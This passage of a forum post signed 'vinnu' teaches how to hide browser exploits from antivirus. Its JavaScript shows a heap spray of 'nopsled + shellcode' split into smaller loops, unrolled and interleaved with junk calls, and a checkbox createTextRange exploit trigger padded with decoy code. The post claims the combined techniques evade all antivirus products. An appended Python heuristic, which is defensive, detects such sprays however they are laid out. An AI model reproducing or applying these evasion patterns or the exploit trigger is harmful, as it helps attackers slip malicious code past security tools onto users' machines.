Loops can eat up resources like CPU, and whenever the task scheduler manager sights the presence of any loop, it allocates more CPU time slice to the host process.
This is the easiest signature for getting caught, like this one in the heap spray article.
Code:
for(i=0;i<1000;i++){spray[i]=nopsled+shellcode;}

This can be broken into smaller loops like:

Code:
for(i=0;i<100;i++){spray[i]=nopsled+shellcode;}
for(i=100;i<200;i++){spray[i]=nopsled+shellcode;}
---
---
---
for(i=950;i<1000;i++){spray[i] = nopsled + shellcode; }
Code:
var i = 0;
spray[i] = nopsled + shellcode; i++;
spray[i] = nopsled + shellcode; i++;
spray[i] = nopsled + shellcode; i++;
spray[i] = nopsled + shellcode; i++;
----
thousand lines of such code.
Otherwise:
Code:
spray[0] = nopsled + shellcode;
spray[1] = nopsled + shellcode;
spray[2] = nopsled + shellcode;
spray[3] = nopsled + shellcode;
---
---
---
spray[999] = nopsled + shellcode;
Code:
function somefunc() {
    var somevar = document.cookie;
}
var vhold;
spray[0] = nopsled + shellcode;
vhold = setTimeout("somefunc()", 50);
spray[1] = nopsled + shellcode;
4. Followup code signature: This kind of strategy makes the antivirus believe that an exploit will always execute a certain fixed instruction. Again, a bad-bad strategy.
E.g. most antivirus will detect the following vulnerability:
Code:
<!--------------------->
<input type="checkbox" id='checkid'>
<script type=text/javascript language=javascript>
a=document.getElementById('checkid');
b=a.createTextRange();
</script>
<!--------------------->
threat as in the following code:
Code:
<!--------------------->
<input type="checkbox" id='checkid'>
<script type=text/javascript language=javascript>
function doit() {
    var asdragger = document.cookie + "hi all";
}
a=document.getElementById('checkid');
var grabit = setTimeout("doit()",1000);
var memc = navigator.appVersion;
b=a.createTextRange();
</script>
<!--------------------->
and with further scrambling, the antivirus evasion is possible.
There exist more techniques which, if employed together with all the above-listed countermeasures, can successfully evade all the antivirus products, even with the latest updates. Just a little more research from your side is needed.
Thanx..."vinnu"
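As an added defensive illustration (not code from vinnu's post), the Python heuristic below keys on what every layout in the post shares, repeated stores of one expression into one array, instead of on the literal `for` loop, so the split-loop, unrolled and interleaved variants all score the same; the JavaScript samples are constructed here and only borrow the `spray`/`nopsled`/`shellcode` names from the post.

```python
import re

# Constructed JavaScript samples (not from the original post), one per layout
# the post describes, plus a short loop that should stay below the threshold.
SINGLE_LOOP = "for(i=0;i<1000;i++){spray[i]=nopsled+shellcode;}"
SPLIT_LOOPS = "\n".join(
    f"for(i={lo};i<{lo + 50};i++){{spray[i]=nopsled+shellcode;}}"
    for lo in range(0, 1000, 50))
UNROLLED = "\n".join(f"spray[{n}] = nopsled + shellcode;" for n in range(1000))
INTERLEAVED = "\n".join(
    f"spray[{n}] = nopsled + shellcode;\nvhold = setTimeout(\"somefunc()\",50);"
    for n in range(1000))
SMALL_LOOP = "for(i=0;i<10;i++){buf[i]=i;}"

# for(i=LO;i<HI;i++){ BODY }  -- numeric bounds, non-nested body (simplification)
LOOP_RE = re.compile(
    r"for\s*\(\s*\w+\s*=\s*(\d+)\s*;\s*\w+\s*<\s*(\d+)\s*;[^)]*\)\s*\{([^{}]*)\}")
# NAME[INDEX] = RHS;  -- index may be a literal or a variable
STORE_RE = re.compile(r"(\w+)\s*\[[^\]]+\]\s*=\s*([^;]+);")


def repeated_store_counts(js):
    """Per (array, whitespace-normalized RHS): how many times that expression is
    written into that array, weighting stores inside a numeric for-loop by the
    loop's iteration count so looped and unrolled forms score alike."""
    counts = {}

    def add(array, rhs, n):
        key = (array, re.sub(r"\s+", "", rhs))
        counts[key] = counts.get(key, 0) + n

    def weigh_loop(m):
        lo, hi, body = int(m.group(1)), int(m.group(2)), m.group(3)
        for s in STORE_RE.finditer(body):
            add(s.group(1), s.group(2), max(hi - lo, 0))
        return ""  # strip the loop so its stores are not counted again below

    remainder = LOOP_RE.sub(weigh_loop, js)
    for s in STORE_RE.finditer(remainder):  # unrolled / interleaved stores
        add(s.group(1), s.group(2), 1)
    return counts


def looks_like_spray(js, threshold=500):
    """True when one expression is stored into one array at least `threshold`
    times, regardless of whether the stores are looped, split, or unrolled."""
    return any(n >= threshold for n in repeated_store_counts(js).values())
```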